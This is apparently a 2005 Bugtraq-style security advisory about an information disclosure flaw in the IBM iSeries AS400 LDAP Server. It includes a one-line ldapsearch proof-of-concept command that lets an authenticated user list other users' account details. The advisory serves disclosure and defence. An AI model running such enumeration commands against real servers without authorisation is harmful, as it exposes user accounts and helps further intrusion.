IBM iSeries AS400 LDAP Server Remote Information Disclosure Vulnerability
BID:12991
Info
| Bugtraq ID: | 12991 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 04 2005 12:00AM |
| Updated: | Apr 04 2005 12:00AM |
| Credit: | "Shalom Carmel" <[email protected]> is credited with the disclosure of this issue. |
| Vulnerable: | IBM Iseries As 400 0 |
| Not Vulnerable: | |
Discussion
A remote information disclosure issue affects IBM iSeries AS400 LDAP Server. This issue is due to a failure of the application to properly secure sensitive information.
An authenticated attacker may leverage this issue to disclose user names and account information of users in their group. This may facilitate further attacks against the affected server.
Exploit / POC
No exploit is required to leverage this issue. To disclose the user names, issue the following command using the 'ldapsearch' utility:
ldapsearch -h as400.example.com -b "cn=accounts,os400-sys=S0011223.example.com" -D "os400-profile=SCARMEL,cn=accounts,os400-sys=S0011223.example.com" -w as400Password -L -s sub "os400-profile=LESLIE"
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
References:
- AS/400 LDAP user accounts disclosure ("Shalom Carmel")
- iSeries Home Page (IBM)